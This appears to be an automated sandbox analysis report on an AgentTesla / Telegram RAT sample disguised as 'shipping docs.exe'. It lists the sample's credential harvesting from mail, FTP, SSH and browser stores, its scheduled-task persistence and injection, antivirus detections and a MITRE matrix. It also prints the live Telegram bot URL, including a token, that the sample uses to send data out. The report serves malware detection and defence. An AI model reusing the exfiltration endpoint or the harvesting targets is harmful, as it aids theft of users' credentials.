                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Users\user\Desktop\shipping docs.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\shipping docs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\shipping docs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		111
                Process Injection                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Web Service                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job                		1
                Registry Run Keys / Startup Folder                		1
                Scheduled Task/Job                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		114
                System Information Discovery                		Remote Desktop Protocol2
                Data from Local System                		Exfiltration Over Bluetooth11
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)1
                Registry Run Keys / Startup Folder                		2
                Obfuscated Files or Information                		1
                Credentials in Registry                		1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                Software Packing                		NTDS311
                Security Software Discovery                		Distributed Component Object Model1
                Input Capture                		Scheduled Transfer3
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets1
                Process Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                Process Injection                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                Hidden Files and Directories                		Proc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 756232 Sample: shipping docs.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Sigma detected: Scheduled temp file as task from temp location 2->56 58 11 other signatures 2->58 7 yVGAJfiVEvtg.exe 5 2->7         started        10 shipping docs.exe 6 2->10         started        13 VMqTMMD.exe 4 2->13         started        15 VMqTMMD.exe 3 2->15         started        process3 file4 70 Multi AV Scanner detection for dropped file 7->70 72 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->72 74 Machine Learning detection for dropped file 7->74 17 yVGAJfiVEvtg.exe 7->17         started        21 schtasks.exe 7->21         started        42 C:\Users\user\AppData\...\yVGAJfiVEvtg.exe, PE32 10->42 dropped 44 C:\Users\user\AppData\Local\...\tmp7934.tmp, XML 10->44 dropped 46 C:\Users\user\...\shipping docs.exe.log, ASCII 10->46 dropped 76 Injects a PE file into a foreign processes 10->76 23 shipping docs.exe 17 6 10->23         started        26 schtasks.exe 1 10->26         started        28 VMqTMMD.exe 13->28         started        30 schtasks.exe 13->30         started        78 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->78 signatures5 process6 dnsIp7 32 conhost.exe 21->32         started        48 api.telegram.org 149.154.167.220, 443, 49699, 49700 TELEGRAMRU United Kingdom 23->48 38 C:\Users\user\AppData\Roaming\...\VMqTMMD.exe, PE32 23->38 dropped 40 C:\Users\user\...\VMqTMMD.exe:Zone.Identifier, ASCII 23->40 dropped 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->60 62 Tries to steal Mail credentials (via file / registry access) 23->62 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->64 34 conhost.exe 26->34         started        50 192.168.2.1 unknown unknown 28->50 66 Tries to harvest and steal ftp login credentials 28->66 68 Tries to harvest and steal browser information (history, passwords, etc) 28->68 36 conhost.exe 30->36         started        file8 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                shipping docs.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                shipping docs.exe47%VirustotalBrowse
                shipping docs.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.0.shipping docs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                Domains

                SourceDetectionScannerLabelLink
                c-0001.c-msedge.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.fontbureau.comgrita0%URL Reputationsafe
                http://www.s.$0%Avira URL Cloudsafe
                https://api.telegram.org40%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.sajatypeworks.comteP$0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/O0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://en.w0%URL Reputationsafe
                https://JIQ1JKgQReGyOBe.com0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/=0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.founder.com.cn/cn/0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.comm0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.founder.com.cn/cnu-h0%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.founder.com.cn/cn%0%URL Reputationsafe
                http://www.sandoll.co.krT0%Avira URL Cloudsafe
                http://www.sandoll.co.krigh0%Avira URL Cloudsafe
                http://Unbjpy.com0%Avira URL Cloudsafe
                http://www.fonts.comtteJ0%Avira URL Cloudsafe
                http://www.founder.com.cn/cnlJ0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/ko0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                c-0001.c-msedge.net
                		13.107.4.50
                		truefalseunknown
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocumentfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.fontbureau.com/designersGshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
